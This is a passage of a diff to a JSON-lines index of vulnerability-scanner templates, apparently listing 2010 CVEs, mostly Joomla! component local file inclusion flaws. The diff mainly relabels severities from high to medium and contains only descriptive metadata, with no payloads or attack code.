JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1469.yaml"} {"ID":"CVE-2010-1470","Info":{"Name":"Joomla! Component Web TV 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1470.yaml"} {"ID":"CVE-2010-1471","Info":{"Name":"Joomla! Component Address Book 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1471.yaml"} {"ID":"CVE-2010-1472","Info":{"Name":"Joomla! Component Horoscope 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1472.yaml"} -{"ID":"CVE-2010-1473","Info":{"Name":"Joomla! Component Advertising 0.25 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1473.yaml"} -{"ID":"CVE-2010-1474","Info":{"Name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1474.yaml"} -{"ID":"CVE-2010-1475","Info":{"Name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Preventive \u0026 Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1475.yaml"} -{"ID":"CVE-2010-1476","Info":{"Name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1476.yaml"} -{"ID":"CVE-2010-1478","Info":{"Name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1478.yaml"} -{"ID":"CVE-2010-1491","Info":{"Name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1491.yaml"} -{"ID":"CVE-2010-1494","Info":{"Name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1494.yaml"} +{"ID":"CVE-2010-1473","Info":{"Name":"Joomla! Component Advertising 0.25 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1473.yaml"} +{"ID":"CVE-2010-1474","Info":{"Name":"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1474.yaml"} +{"ID":"CVE-2010-1475","Info":{"Name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Preventive \u0026 Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1475.yaml"} +{"ID":"CVE-2010-1476","Info":{"Name":"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1476.yaml"} +{"ID":"CVE-2010-1478","Info":{"Name":"Joomla! Component Jfeedback 1.2 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1478.yaml"} +{"ID":"CVE-2010-1491","Info":{"Name":"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1491.yaml"} +{"ID":"CVE-2010-1494","Info":{"Name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1494.yaml"} {"ID":"CVE-2010-1495","Info":{"Name":"Joomla! Component Matamko 1.01 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1495.yaml"} {"ID":"CVE-2010-1531","Info":{"Name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1531.yaml"} -{"ID":"CVE-2010-1532","Info":{"Name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1532.yaml"} +{"ID":"CVE-2010-1532","Info":{"Name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1532.yaml"} {"ID":"CVE-2010-1533","Info":{"Name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1533.yaml"} -{"ID":"CVE-2010-1534","Info":{"Name":"Joomla! Component Shoutbox Pro - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1534.yaml"} +{"ID":"CVE-2010-1534","Info":{"Name":"Joomla! Component Shoutbox Pro - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1534.yaml"} {"ID":"CVE-2010-1535","Info":{"Name":"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1535.yaml"} -{"ID":"CVE-2010-1540","Info":{"Name":"Joomla! Component com_blog - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1540.yaml"} +{"ID":"CVE-2010-1540","Info":{"Name":"Joomla! Component com_blog - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1540.yaml"} {"ID":"CVE-2010-1586","Info":{"Name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in red2301.html in HP System Management Homepage (SMH) 2.x.x.x allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the RedirectUrl parameter.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2010/CVE-2010-1586.yaml"} -{"ID":"CVE-2010-1601","Info":{"Name":"Joomla! Component JA Comment - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1601.yaml"} +{"ID":"CVE-2010-1601","Info":{"Name":"Joomla! Component JA Comment - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1601.yaml"} {"ID":"CVE-2010-1602","Info":{"Name":"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1602.yaml"} {"ID":"CVE-2010-1603","Info":{"Name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1603.yaml"} -{"ID":"CVE-2010-1607","Info":{"Name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1607.yaml"} +{"ID":"CVE-2010-1607","Info":{"Name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1607.yaml"} {"ID":"CVE-2010-1653","Info":{"Name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1653.yaml"} -{"ID":"CVE-2010-1657","Info":{"Name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1657.yaml"} -{"ID":"CVE-2010-1658","Info":{"Name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1658.yaml"} -{"ID":"CVE-2010-1659","Info":{"Name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1659.yaml"} -{"ID":"CVE-2010-1714","Info":{"Name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1714.yaml"} -{"ID":"CVE-2010-1715","Info":{"Name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1715.yaml"} -{"ID":"CVE-2010-1717","Info":{"Name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1717.yaml"} -{"ID":"CVE-2010-1718","Info":{"Name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1718.yaml"} -{"ID":"CVE-2010-1719","Info":{"Name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1719.yaml"} -{"ID":"CVE-2010-1722","Info":{"Name":"Joomla! Component Online Market 2.x - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1722.yaml"} -{"ID":"CVE-2010-1723","Info":{"Name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1723.yaml"} -{"ID":"CVE-2010-1858","Info":{"Name":"Joomla! Component SMEStorage - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1858.yaml"} -{"ID":"CVE-2010-1870","Info":{"Name":"ListSERV Maestro \u003c= 9.0-8 RCE","Severity":"info","Description":"A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1870.yaml"} +{"ID":"CVE-2010-1657","Info":{"Name":"Joomla! Component SmartSite 1.0.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1657.yaml"} +{"ID":"CVE-2010-1658","Info":{"Name":"Joomla! Component NoticeBoard 1.3 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1658.yaml"} +{"ID":"CVE-2010-1659","Info":{"Name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1659.yaml"} +{"ID":"CVE-2010-1714","Info":{"Name":"Joomla! Component Arcade Games 1.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1714.yaml"} +{"ID":"CVE-2010-1715","Info":{"Name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1715.yaml"} +{"ID":"CVE-2010-1717","Info":{"Name":"Joomla! Component iF surfALERT 1.2 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1717.yaml"} +{"ID":"CVE-2010-1718","Info":{"Name":"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1718.yaml"} +{"ID":"CVE-2010-1719","Info":{"Name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1719.yaml"} +{"ID":"CVE-2010-1722","Info":{"Name":"Joomla! Component Online Market 2.x - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1722.yaml"} +{"ID":"CVE-2010-1723","Info":{"Name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1723.yaml"} +{"ID":"CVE-2010-1858","Info":{"Name":"Joomla! Component SMEStorage - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1858.yaml"} +{"ID":"CVE-2010-1870","Info":{"Name":"ListSERV Maestro \u003c= 9.0-8 RCE","Severity":"medium","Description":"A struts-based OGNL remote code execution vulnerability exists in ListSERV Maestro before and including version 9.0-8.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1870.yaml"} {"ID":"CVE-2010-1875","Info":{"Name":"Joomla! Component Property - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1875.yaml"} {"ID":"CVE-2010-1878","Info":{"Name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1878.yaml"} {"ID":"CVE-2010-1952","Info":{"Name":"Joomla! Component BeeHeard 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1952.yaml"} @@ -121,10 +121,10 @@ {"ID":"CVE-2010-1956","Info":{"Name":"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1956.yaml"} {"ID":"CVE-2010-1957","Info":{"Name":"Joomla! Component Love Factory 1.3.4 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1957.yaml"} {"ID":"CVE-2010-1977","Info":{"Name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1977.yaml"} -{"ID":"CVE-2010-1979","Info":{"Name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1979.yaml"} +{"ID":"CVE-2010-1979","Info":{"Name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1979.yaml"} {"ID":"CVE-2010-1980","Info":{"Name":"Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in joomlaflickr.php in the Joomla! Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1980.yaml"} -{"ID":"CVE-2010-1981","Info":{"Name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1981.yaml"} -{"ID":"CVE-2010-1982","Info":{"Name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1982.yaml"} +{"ID":"CVE-2010-1981","Info":{"Name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2010/CVE-2010-1981.yaml"} +{"ID":"CVE-2010-1982","Info":{"Name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2010/CVE-2010-1982.yaml"} {"ID":"CVE-2010-1983","Info":{"Name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","Severity":"high","Description":"A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-1983.yaml"} {"ID":"CVE-2010-2033","Info":{"Name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","Severity":"high","Description":"A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2010/CVE-2010-2033.yaml"} 